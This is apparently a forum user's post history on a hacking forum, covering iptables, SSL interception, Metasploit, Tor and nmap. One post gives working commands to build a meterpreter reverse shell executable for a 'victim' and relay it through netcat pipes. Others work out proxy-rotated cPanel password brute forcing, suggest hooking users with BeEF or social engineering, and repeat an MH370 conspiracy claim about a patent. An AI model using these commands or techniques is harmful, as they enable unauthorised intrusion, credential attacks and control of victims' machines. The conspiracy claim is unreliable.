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Posts posted by i8igmac

  1. there are iptable tutorials for this.

    Using iptables on tthe router send the traffic to a machine running a proxy. Then with this proxy you can configure more iptable rules to block or redirect a up to date list of known ads by ip... you could even catch the users with a redirect to beef or something

  2. so. I have tried sending some fb traffic threw sslstrip and I get nothing.

    I have tried sending fb traffic threw burp proxy and the browser wont even ask to install the cert.

    Google traffics works fine with sslstrip and burp certs

    I would like to capture some headers for automated task's... I have done all this before but today I notice facebook wont give...

    Can some one try sslstrip on facebook? let me know if its working or not?

  3. it is not uncommon to be scanned! It happens! Would be interested in seeing a tcodump! I wondr if maybe metasploit exploit handler has a zero day floating around

    Apt-get install tcpick

    Tcpick -yP -C "port 4444"

    Your windows machine should not hang on the stage, something is wrong. I would try a reverse meterpreter with out the stager

  4. Looks like the first category to me plus you could simply use several regular proxies for this rather than tor. Performance should be better.

    Lol agreed I have a google crawler for generating a list of working proxy's for use with proxychains... just a example

  5. That Sir was awesome. Thank you very mucch my question is answered .

    if you sit down and look at what this forum teaches - Tor is freaking useless!

    So wrong, not all minds can grasp this stuff... just a example...

    Lets say u want to brute force a cpannel login, I could explain the ip banning process but Ill skip that...

    You must sleep for 5 seconds between each login attempt, if you have a list of 100 proxy's you can now achieve how many password attempts per minute ?

    If it took 20,000 attempts for a success how long will it take?

    How long would it take with out tor?

    How easy was this attack?

    one ip address would take 1,666 minutes

    100 ip address would take 16 minutes

    Is my math wrong? Lol

  6. I would start with nmap. follow some irongeek nmap tutorials. Discover the devices on your network. find open ports on these devices and how to use the service.

    As cooper said disect each command nmap -h

    metasploit is also fun and will have u hooked. Install damn vulnerable os

    iron geek also has some old videos on metasploit

  7. Sure there is a paper trail...

    would you rob a bank and leave your drivers license on the counter ? Or put on a ski mask...

    Illegal activity and privacy are 2 separate subjects... I would not use tor with any private information or login credentials

  8. Is this your private network? Are u on windows? Do u know how to use nmap?

    If you are on windows you should restart your computer and then run in cmd 'netstat -nb' this will print out applications established connections... always monitor your applications out going traffic... post the output here plz... run the command every few minuts...

    I'm sure if someone is spying on u. We can find it...

    Or did I miss understand your post?

    Edit; The chunck of data base64: can be decoded paste that chunk into a online decodér

    Check google 'online base64 decoder'

  9. 20 Freescale employees, among 239 people on flight MH370, were engineers working on radio frequency products for applications in avionics, radar, missile guidance, electronic warfare and identification friend or foe technologys...

    4 days after the flight disappeared, semiconductor patent was approved by the US patent office. The patent was split between 5 people at 20%

    4 of those people disappeared with the flight...

    Rothschild inherits 100% of semiconductor patent...

    I'm board and wonder how radars work and then how would you trick the radar in think you don't exist

  10. Netstat -np

    scrole to the top of this output and u will see applications established ip's

    I don't know anything about this chat application but I'm sure you are not directly connected to the other client.

    So, it you most likely need to send a link u hope they click on...

    And once u do have there ip I'm sure a simple nmap scan will show all filtered ports.

    so you may need some social Engineering. exploit the user is better quicker results

  11. I have a local SVN server and I usually back it up in there but in this case I didn't and while saying "rm [tab complete file name]" I accidentally deleted my script before ever backing it up. But yes back ups are very important

  12. Ok, im at my machine, this should work...


    ssh-box_ip= #public-ip

    port 666 and 555 need to be farword on your ssh-box


    mkfifo ssh-box

    nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box


    from kali, generate payload and set up handler... transfer your payload to the victim... start some nc pipes

    msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe

    msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E

    #new terminal

    mkfifo kali

    nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali


    victim execute test.exe will connect back to ssh on port 666

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